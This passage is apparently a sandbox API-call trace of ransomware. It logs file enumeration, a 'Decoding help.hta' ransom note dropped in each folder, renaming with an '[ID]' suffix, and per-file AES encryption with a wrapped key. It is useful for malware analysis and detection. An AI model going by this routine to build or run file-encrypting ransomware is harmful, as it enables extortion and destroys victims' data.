(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.055] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x508 [0042.055] CreateFileMappingA (hFile=0x508, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x50c [0042.055] CryptAcquireContextA (in: phProv=0x1050fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1050fcec*=0x344a348) returned 1 [0045.317] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x1050fce8 | out: phKey=0x1050fce8*=0x5d8950) returned 1 [0045.317] CryptExportKey (in: hKey=0x5d8950, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1050fbe4, pdwDataLen=0x1050fce4 | out: pbData=0x1050fbe4*, pdwDataLen=0x1050fce4*=0x2c) returned 1 [0045.317] MapViewOfFile (hFileMappingObject=0x50c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a60) returned 0x3a10000 [0045.801] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1050fbe4*, pdwDataLen=0x1050fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1050fbe4*, pdwDataLen=0x1050fcf8*=0x100) returned 1 [0048.933] CryptEncrypt (in: hKey=0x5d8950, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a10000, pdwDataLen=0x1050fce4*=0x3a60, dwBufLen=0x3a60 | out: pbData=0x3a10000*, pdwDataLen=0x1050fce4*=0x3a60) returned 1 [0048.947] UnmapViewOfFile (lpBaseAddress=0x3a10000) returned 1 [0048.949] CloseHandle (hObject=0x50c) returned 1 [0048.949] CryptDestroyKey (hKey=0x5d8950) returned 1 [0048.949] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0048.949] SetFilePointerEx (in: hFile=0x508, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.949] WriteFile (in: hFile=0x508, lpBuffer=0x1050fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1050fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1050fbe4*, lpNumberOfBytesWritten=0x1050fcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.067] WriteFile (in: hFile=0x508, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1050fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1050fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.045] CloseHandle (hObject=0x508) returned 1 [0052.546] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.465] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1050fd30 | out: lpFindFileData=0x1050fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0056.757] lstrcpyW (in: lpString1=0x10c86800, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" [0056.758] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned 35 [0056.758] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta" [0056.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\mf\\decoding help.hta")) returned 0x1 [0056.758] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Pending.GRL") returned -1 [0056.758] lstrlenW (lpString="Pending.GRL") returned 11 [0056.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" [0056.758] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned 35 [0056.758] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\", lpString2="Pending.GRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" [0056.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" [0056.758] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]" [0056.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.758] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1050fd30 | out: lpFindFileData=0x1050fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0056.758] FindClose (in: hFindFile=0x5d8910 | out: hFindFile=0x5d8910) returned 1 Thread: id = 217 os_tid = 0x810 [0040.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x1064fd30 | out: lpFindFileData=0x1064fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db238 [0042.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.190] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1064fd30 | out: lpFindFileData=0x1064fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.190] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.190] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.190] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1064fd30 | out: lpFindFileData=0x1064fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.190] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Users\\Default\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*.*") returned="\\\\?\\C:\\Users\\Default\\Music\\*.*" [0042.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\*.*") returned 30 [0042.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Music\\Decoding help.hta" [0042.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\Decoding help.hta" (normalized: "c:\\users\\default\\music\\decoding help.hta")) returned 0xffffffff [0042.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\Decoding help.hta" (normalized: "c:\\users\\default\\music\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0042.261] WriteFile (in: hFile=0x590, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1064fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1064fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.262] CloseHandle (hObject=0x590) returned 1 [0042.263] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.263] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0042.263] lstrlenW (lpString="desktop.ini") returned 11 [0042.263] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*.*") returned="\\\\?\\C:\\Users\\Default\\Music\\*.*" [0042.263] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\*.*") returned 30 [0042.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" [0042.263] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" [0042.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0042.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0042.264] CreateFileMappingA (hFile=0x590, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x594 [0042.264] CryptAcquireContextA (in: phProv=0x1064fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1064fcec*=0x245f31b0) returned 1 [0048.444] CryptGenKey (in: hProv=0x245f31b0, Algid=0x6610, dwFlags=0x1, phKey=0x1064fce8 | out: phKey=0x1064fce8*=0x5db3f8) returned 1 [0048.444] CryptExportKey (in: hKey=0x5db3f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1064fbe4, pdwDataLen=0x1064fce4 | out: pbData=0x1064fbe4*, pdwDataLen=0x1064fce4*=0x2c) returned 1 [0048.444] MapViewOfFile (hFileMappingObject=0x594, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e0) returned 0x570000 [0048.446] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1064fbe4*, pdwDataLen=0x1064fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1064fbe4*, pdwDataLen=0x1064fcf8*=0x100) returned 1 [0048.446] CryptEncrypt (in: hKey=0x5db3f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x570000*, pdwDataLen=0x1064fce4*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x570000*, pdwDataLen=0x1064fce4*=0x1e0) returned 1 [0048.446] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0048.448] CloseHandle (hObject=0x594) returned 1 [0048.448] CryptDestroyKey (hKey=0x5db3f8) returned 1 [0048.448] CryptReleaseContext (hProv=0x245f31b0, dwFlags=0x0) returned 1 [0048.448] SetFilePointerEx (in: hFile=0x590, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.448] WriteFile (in: hFile=0x590, lpBuffer=0x1064fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1064fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1064fbe4*, lpNumberOfBytesWritten=0x1064fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.693] WriteFile (in: hFile=0x590, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1064fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1064fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.693] CloseHandle (hObject=0x590) returned 1 [0052.694] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.922] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1064fd30 | out: lpFindFileData=0x1064fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0056.922] FindClose (in: hFindFile=0x5db238 | out: hFindFile=0x5db238) returned 1 Thread: id = 218 os_tid = 0x80c [0040.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*", lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d80d0 [0040.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.794] FindNextFileW (in: hFindFile=0x5d80d0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.794] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.794] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.794] FindNextFileW (in: hFindFile=0x5d80d0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1cf9700, ftCreationTime.dwHighDateTime=0x1cac649, ftLastAccessTime.dwLowDateTime=0x8a491400, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xc1cf9700, ftLastWriteTime.dwHighDateTime=0x1cac649, nFileSizeHigh=0x0, nFileSizeLow=0x3d63, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssemblyList_4_client.xml", cAlternateFileName="ASSEMB~1.XML")) returned 1 [0041.249] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" [0041.249] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned 55 [0041.249] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta" [0041.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\decoding help.hta")) returned 0xffffffff [0041.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0041.261] WriteFile (in: hFile=0x43c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x380fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.262] CloseHandle (hObject=0x43c) returned 1 [0041.263] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.263] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AssemblyList_4_client.xml") returned 1 [0041.263] lstrlenW (lpString="AssemblyList_4_client.xml") returned 25 [0041.263] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" [0041.263] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned 55 [0041.263] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\", lpString2="AssemblyList_4_client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" [0041.263] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" [0041.263] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0041.264] CreateFileMappingA (hFile=0x43c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x440 [0041.264] CryptAcquireContextA (in: phProv=0x380fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x380fcec*=0x3449820) returned 1 [0043.834] CryptGenKey (in: hProv=0x3449820, Algid=0x6610, dwFlags=0x1, phKey=0x380fce8 | out: phKey=0x380fce8*=0x5d8810) returned 1 [0043.834] CryptExportKey (in: hKey=0x5d8810, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x380fbe4, pdwDataLen=0x380fce4 | out: pbData=0x380fbe4*, pdwDataLen=0x380fce4*=0x2c) returned 1 [0043.834] MapViewOfFile (hFileMappingObject=0x440, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d60) returned 0x4540000 [0044.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x100) returned 1 [0047.250] CryptEncrypt (in: hKey=0x5d8810, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4540000, pdwDataLen=0x380fce4*=0x3d60, dwBufLen=0x3d60 | out: pbData=0x4540000*, pdwDataLen=0x380fce4*=0x3d60) returned 1 [0047.251] UnmapViewOfFile (lpBaseAddress=0x4540000) returned 1 [0047.252] CloseHandle (hObject=0x440) returned 1 [0047.253] CryptDestroyKey (hKey=0x5d8810) returned 1 [0047.253] CryptReleaseContext (hProv=0x3449820, dwFlags=0x0) returned 1 [0047.253] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.253] WriteFile (in: hFile=0x43c, lpBuffer=0x380fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x380fbe4*, lpNumberOfBytesWritten=0x380fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.450] WriteFile (in: hFile=0x43c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x380fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.451] CloseHandle (hObject=0x43c) returned 1 [0050.398] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.656] FindNextFileW (in: hFindFile=0x5d80d0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc643900, ftCreationTime.dwHighDateTime=0x1cac666, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xdc643900, ftLastWriteTime.dwHighDateTime=0x1cac666, nFileSizeHigh=0x0, nFileSizeLow=0x201c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssemblyList_4_extended.xml", cAlternateFileName="ASSEMB~2.XML")) returned 1 [0053.656] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" [0053.656] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned 55 [0053.656] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta" [0053.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\decoding help.hta")) returned 0x1 [0053.656] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AssemblyList_4_extended.xml") returned 1 [0053.656] lstrlenW (lpString="AssemblyList_4_extended.xml") returned 27 [0053.656] lstrcmpiW (lpString1="[ID]", lpString2=".xml") returned 1 [0053.656] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" 